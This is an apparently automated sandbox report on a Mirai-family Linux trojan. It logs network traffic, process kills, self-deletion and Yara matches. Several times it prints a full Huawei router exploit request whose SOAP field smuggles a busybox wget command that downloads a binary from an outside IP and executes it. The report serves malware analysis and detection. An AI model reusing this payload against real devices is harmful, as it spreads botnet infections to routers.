Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 157.43.138.117
Source: unknown	TCP traffic detected without corresponding DNS query: 197.199.46.51
Source: unknown	TCP traffic detected without corresponding DNS query: 220.45.152.133
Source: unknown	TCP traffic detected without corresponding DNS query: 197.202.20.211
Source: unknown	TCP traffic detected without corresponding DNS query: 197.226.217.5
Source: unknown	TCP traffic detected without corresponding DNS query: 197.148.57.191
Source: unknown	TCP traffic detected without corresponding DNS query: 157.82.58.188
Source: unknown	TCP traffic detected without corresponding DNS query: 157.90.182.81
Source: unknown	TCP traffic detected without corresponding DNS query: 157.177.191.34
Source: unknown	TCP traffic detected without corresponding DNS query: 185.43.20.146
Source: unknown	TCP traffic detected without corresponding DNS query: 84.113.211.26
Source: unknown	TCP traffic detected without corresponding DNS query: 197.218.51.50
Source: unknown	TCP traffic detected without corresponding DNS query: 41.71.199.98
Source: unknown	TCP traffic detected without corresponding DNS query: 105.71.149.211
Source: unknown	TCP traffic detected without corresponding DNS query: 41.223.217.46
Source: unknown	TCP traffic detected without corresponding DNS query: 205.100.192.28
Source: unknown	TCP traffic detected without corresponding DNS query: 198.104.199.41
Source: unknown	TCP traffic detected without corresponding DNS query: 104.190.185.49
Source: unknown	TCP traffic detected without corresponding DNS query: 157.170.156.84
Source: unknown	TCP traffic detected without corresponding DNS query: 41.178.248.140
Source: unknown	TCP traffic detected without corresponding DNS query: 157.251.62.132
Source: unknown	TCP traffic detected without corresponding DNS query: 82.153.137.13
Source: unknown	TCP traffic detected without corresponding DNS query: 157.157.159.18
Source: unknown	TCP traffic detected without corresponding DNS query: 157.53.30.248
Source: unknown	TCP traffic detected without corresponding DNS query: 41.138.254.90
Source: unknown	TCP traffic detected without corresponding DNS query: 157.57.129.112
Source: unknown	TCP traffic detected without corresponding DNS query: 41.121.183.43
Source: unknown	TCP traffic detected without corresponding DNS query: 64.235.3.161
Source: unknown	TCP traffic detected without corresponding DNS query: 157.137.17.160
Source: unknown	TCP traffic detected without corresponding DNS query: 97.172.198.64
Source: unknown	TCP traffic detected without corresponding DNS query: 197.23.242.135
Source: unknown	TCP traffic detected without corresponding DNS query: 183.18.78.201
Source: unknown	TCP traffic detected without corresponding DNS query: 41.134.38.202
Source: unknown	TCP traffic detected without corresponding DNS query: 197.74.204.95
Source: unknown	TCP traffic detected without corresponding DNS query: 197.171.71.249
Source: unknown	TCP traffic detected without corresponding DNS query: 197.109.56.254
Source: unknown	TCP traffic detected without corresponding DNS query: 101.247.147.46
Source: unknown	TCP traffic detected without corresponding DNS query: 147.19.19.242
Source: unknown	TCP traffic detected without corresponding DNS query: 41.117.192.227
Source: unknown	TCP traffic detected without corresponding DNS query: 157.63.15.50
Source: unknown	TCP traffic detected without corresponding DNS query: 197.24.122.140
Source: unknown	TCP traffic detected without corresponding DNS query: 41.57.158.162
Source: unknown	TCP traffic detected without corresponding DNS query: 197.92.235.136
Source: unknown	TCP traffic detected without corresponding DNS query: 41.77.179.171
Source: unknown	TCP traffic detected without corresponding DNS query: 135.200.78.17
Source: unknown	TCP traffic detected without corresponding DNS query: 158.6.148.254
Source: unknown	TCP traffic detected without corresponding DNS query: 197.109.141.56
Source: unknown	TCP traffic detected without corresponding DNS query: 197.93.140.110
Source: unknown	TCP traffic detected without corresponding DNS query: 197.54.89.212

Source: unknown

DNS traffic detected: queries for: security.rebirth-network.su

Source: unknown

HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 460Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 37 30 2e 31 34 39 2e 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 3b 20 2f 74 6d 70 2f 2e 72 65 62 69 72 74 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.70.149.14 -l /tmp/.rebirth -r /mips; /bin/busybox chmod 777 /tmp/.rebirth; /tmp/.rebirth huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: ul5RjxwWTK.elf, 6209.1.0000000008048000.000000000805f000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: ul5RjxwWTK.elf, 6209.1.0000000008048000.000000000805f000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 6209.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_3a56423b Author: unknown
Source: 6209.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_dab39a25 Author: unknown

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 772, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1532, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1622, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1633, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1638, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1664, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2146, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2223, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2302, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 4333, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 4438, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6185, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6215, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6237, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6235, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6239, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6240, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6241, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6242, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6244, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6245, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6246, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6247, result: successful	Jump to behavior

Sample contains only a LOAD segment without any section mappings

Source: LOAD without section mappings

Program segment: 0x8048000

Sample tries to kill a process (SIGKILL)

Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 721, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 772, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1532, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1601, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1622, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1633, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1638, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1664, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1877, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 1983, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2074, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2096, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2102, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2126, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2146, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2223, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 2302, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 4333, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 4438, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6185, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6215, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6237, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6235, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6239, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6240, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6241, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6242, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6244, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6245, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6246, result: successful	Jump to behavior
Source: /tmp/ul5RjxwWTK.elf (PID: 6212)	SIGKILL sent: pid: 6247, result: successful	Jump to behavior

Yara signature match

Source: 6209.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_3a56423b os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 117d6eb47f000c9d475119ca0e6a1b49a91bbbece858758aaa3d7f30d0777d75, id = 3a56423b-c0cf-4483-87e3-552beb40563a, last_modified = 2021-09-16
Source: 6209.1.0000000008048000.000000000805f000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_dab39a25 reference_sample = 3e02fb63803110cabde08e809cf4acc1b8fb474ace531959a311858fdd578bab, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 5a628d9af9d6dccf29e78f780bb74a2fa25167954c34d4a1529bdea5ea891ac0, id = dab39a25-852b-441f-86ab-23d945daa62c, last_modified = 2022-01-26

Source: classification engine

Classification label: mal84.spre.troj.evad.linELF@0/0@21/0

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /tmp/ul5RjxwWTK.elf (PID: 6209)

File: /tmp/ul5RjxwWTK.elf

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 34688 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41692 -> 37215
